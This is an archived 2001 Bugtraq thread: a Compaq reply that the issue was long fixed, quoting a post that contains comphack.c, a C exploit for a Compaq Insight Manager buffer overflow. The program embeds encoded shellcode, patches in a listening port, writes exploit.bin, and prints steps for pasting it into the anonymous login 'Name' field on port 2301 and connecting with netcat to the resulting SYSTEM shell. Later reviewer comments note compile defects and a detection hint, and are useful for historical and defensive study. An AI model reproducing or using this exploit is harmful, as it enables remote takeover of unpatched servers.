re: comphack - Compaq Insight Manager Remote SYSTEM shell
From: "Boren, Rich (SSRT)" <Rich.Boren () COMPAQ com>
Date: Fri, 7 Dec 2001 16:06:43 -0700
re: comphack - Compaq Insight Manager Remote SYSTEM shell This has been fixed for at least 18 months. We suggest that you get the current release of software of agents and Compaq Insight manager. Version 5.2 or 5.1 it's on the web.... http://www.compaq.com/products/servers/management/ and so the are the old advisories... www.compaq.com/products/servers/management/system-advisories.html regards, Rich -----Original Message----- From: Indigo [mailto:indig0 () talk21 com] Sent: Thursday, November 29, 2001 4:55 AM To: bugtraq () securityfocus com Subject: comphack - Compaq Insight Manager Remote SYSTEM shell Mailer: SecurityFocus I'm running out of Win32 vulnerabilities to exploit here...Anyone got any ideas? Cheers, Indigo.
/*
 * comphack.c - Compaq Insight Manager overflow exploit
 * by Indigo <indig0 () talk21 com> 2001
 *
 * Usage: comphack <victim port>
 *
 * This code has been compiled and tested on Linux and Win32
 * The shellcode spawns a SYSTEM shell on the chosen port
 * Main shellcode adapted from code written by izan () deepzone org
 * Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
 */
/*
 * Reviewer notes on this archive copy:
 *  - Historical (2001) proof-of-concept. The vendor reply above states the
 *    issue had been fixed well before the post and points at the Compaq
 *    system-advisories page for the affected and fixed agent versions.
 *  - The listing was line-wrapped in transit: the stray spaces inside the
 *    string literals ("\x61 \x61", "\ x5F", "\x 5F") are wrapping artifacts,
 *    so the file does not compile as archived, and the fixed offsets 1650
 *    and 1651 used in main() presuppose the unwrapped buffer length.
 *  - exit(), atoi() and htons() are called with only <stdio.h> included,
 *    i.e. without <stdlib.h> and the socket header that declares htons()
 *    (implicit declarations).
 *  - fopen() is never checked, so a failed open becomes a NULL stream
 *    handed to fputs() and fclose().
 *  - Defender note: per the usage text printed below, delivery is an
 *    over-long value in the 'Name' field of the anonymous login on
 *    TCP/2301. An HTTP request on that port carrying a form value in the
 *    kilobyte range is the thing to alert on; the fix is the patched
 *    agent / Insight Manager release named in the vendor reply.
 */
/* #include <windows.h> uncomment if compiling on Win32 */
#include <stdio.h>

/*
 * Program entry point.
 *
 * argv[1] is the TCP port the payload should listen on. Writes the payload
 * buffer to ./exploit.bin in the current directory and prints the manual
 * steps the author used with it.
 *
 * Returns 0 on success; also exits with status 0 on a usage error (a
 * non-zero status would be the conventional choice there).
 */
int main(int argc, char **argv)
{
    /* Padding followed by the payload. The trailing "\x00" terminates it as
     * a C string, which is what the fputs() call below writes up to. Bytes
     * 1650 and 1651 are overwritten with the port at run time. The embedded
     * spaces and "\ x5F" / "\x 5F" fragments are mail-wrapping damage, not
     * part of the original source. */
    unsigned char shellcode[] =
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61 \x61\x61\x61\x61"
    "\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77 \xFF\xE1\x03\x10"
    "\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7 \x31\xC9\xB1\x6F"
    "\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07 \x31\xDB\xB3\x18"
    "\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3 \x1D\x01\xDF\x29\x07"
    "\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07 \xB3\x05\x01\xDF"
    "\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07 \xB3\x12\x01\xDF"
    "\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01 \xDF\x29\x07\xB3\x14"
    "\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3 \x3F\x01\xDF\x29\x07"
    "\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07 \xB3\x08\x01\xDF"
    "\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01 \xDF\x29\x07\x66\x81"
    "\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07 \x47\x47\x47\x47"
    "\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7 \x5F\x5F\x5F\x5F"
    "\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2 \xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
    "\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7 \xAD\x5D\x5F\x5F\xD2"
    "\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35 \x55\xCF\xCF\xCF"
    "\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09"
    "\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09\xA0\xCA"
    "\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6 \x7A\x1F\x5F\x09\xD2\xEA\xB2"
    "\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0 \xCA\x6C\x7A\x1F"
    "\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2 \xEA\xAA\x7A\x1F"
    "\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79 \x1F\x5F\xF2\x0F"
    "\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79 \x1F\x5F\xF2\x0F\xA0\xCA"
    "\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2 \xE2\x72\x79\x1F\x5F"
    "\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2 \x6E\x79\x1F\x5F\xF4\xD2"
    "\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79 \x1F\x5F\x5F\x5F\x5F\x5F"
    "\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2 \xEA\x66\x79\x1F\x5F"
    "\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35 \x5F\x35\x4F\x35\x5E"
    "\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35 \x5F\xA0\xCA\x64"
    "\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37 \x5F\x5D\x5F\x5F\xA0\xCA"
    "\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79 \x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
    "\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2 \xEA\xB6\x7A\x1F"
    "\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35 \x5C\x0C\xA0\xCA\x5D\x7A"
    "\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6 \x7A\x1F\x5F\x09"
    "\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79 \x1F\x5F\xF4\x6C\xBF"
    "\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2 \xEA\xB6\x7A\x1F"
    "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F"
    "\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2 \x3A\x79\x1F\x5F\x08"
    "\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x60\x7A\x1F"
    "\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2 \x3A\x79\x1F\x5F\x5D"
    "\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79 \x1F\x5F\x5E\x7F\x5F\x5F"
    "\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79 \x1F\x5F\x5F\x7F\x5F\x5F"
    "\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79 \x1F\x5F\x08\x0F"
    "\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6 \x7A\x1F\x5F\xF2\x0F\xA0"
    "\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10 \x7A\x1F\x5F\xD4\xDA\x3A"
    "\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2\xEA"
    "\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55 \x7A\x1F\x5F\x35\x5F\xD2\xE2"
    "\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2 \xEA\xB6\x7A\x1F"
    "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0 \xCA\x10\x7A\x1F"
    "\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38 \xA0\xA0\xA0\x35"
    "\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79 \x1F\x5F\xF2\x0F\xD2"
    "\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51 \x7A\x1F\x5F\xD6\xDA\x3E"
    "\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08 \x0F\xD2\xEA\x0E"
    "\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2 \x0F\xA0\xCA\x14"
    "\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35 \x5F\xD4\xDA\x3E"
    "\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4 \xDA\x0E\x79\x1F"
    "\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0 \xCA\x18\x7A\x1F\x5F"
    "\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0 \xA0\xD2\xEA\x06"
    "\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2 \xEA\x02\x79\x1F"
    "\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0 \xCA\x08\x7A\x1F"
    "\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\x04\x06\x08"
    "\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0 \x4D\x0F\xF3\xDB"
    "\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10 \x1C\x14\x6C\x6D"
    "\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31 \x3B\x5F\x33\x36\x2C"
    "\x2B\x3A\x31 \x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31 \x3B\x5F"
    "\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30 \x3C\x34\x3A\x2B"
    "\x5F\x14\x1A\x2D\x11\x1A\x13 \x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
    "\x0F\x36\x2F\x3A\x5F\x18 \x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
    "\x31\x39\x30 \x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30 \x3C\x3A"
    "\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32 \x3A\x3B\x0F\x36\x2F"
    "\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30 \x3C\x5F\x2D\x3A"
    "\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36 \x2B\x3A\x19\x36\x33\x3A"
    "\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30 \x2C\x3A\x17\x3E\x31\x3B"
    "\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30 \x3C\x3A\x2C\x2C\x5F\x1C"
    "\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31 \x7F\x63\x36\x25"
    "\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71 \x30\x2D\x38\x61"
    "\x5D\x5F\x40\x17 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
    "\x53 \x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x 5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x1C\x12\x1B\x71\x1A\x07 \x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
    "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\ x5F\x5F\x5F\x5F"
    "\x56\x56\x56\x56\x56\x00";
    FILE *fp;                    /* output stream for ./exploit.bin; never NULL-checked */
    unsigned short int a_port;   /* 16-bit port value patched into the buffer */

    /* Banner and the author's manual usage steps; these are also the
     * defender's description of the delivery path (anonymous login on
     * http://victim:2301, over-long 'Name' field). */
    printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n");
    printf ("This program will generate a binary file called exploit.bin\n");
    printf ("Connect to the victim using a web browser http://victim:2301\n");
    printf ("Next to \'Login Account\', click on \'anonymous\'\n");
    printf ("Enter some random characters into the \'password\' field\n");
    printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n");
    printf ("Paste the exploit into the \'Name\' field and click OK\n");
    printf ("\nLaunch netcat: nc <victim host> <victim port>\n");
    printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

    if (argc != 2) {
        printf ("Usage: %s <victim port>\n", argv[0]);
        exit (0);   /* exit() needs <stdlib.h>; status 0 despite the usage error */
    }

    /* Port from argv[1] in network byte order. atoi() reports no errors, so
     * a non-numeric argument silently becomes port 0. htons() is declared in
     * a socket header that is not included here. */
    a_port = htons(atoi(argv[1]));
    /* Both port bytes are XOR-masked with 0x5f before being written into
     * the buffer at the two fixed offsets below. */
    a_port^= 0x5f5f;
    shellcode[1650]= (a_port) & 0xff;
    shellcode[1651]= (a_port >> 8) & 0xff;

    /* Unchecked fopen(): on failure fp is NULL when passed on. fputs() takes
     * a char pointer, so the unsigned char buffer is a pointer-sign mismatch;
     * it is written as a C string, i.e. up to the trailing "\x00". */
    fp = fopen ("./exploit.bin","wb");
    fputs (shellcode,fp);
    fclose (fp);
    return 0;
}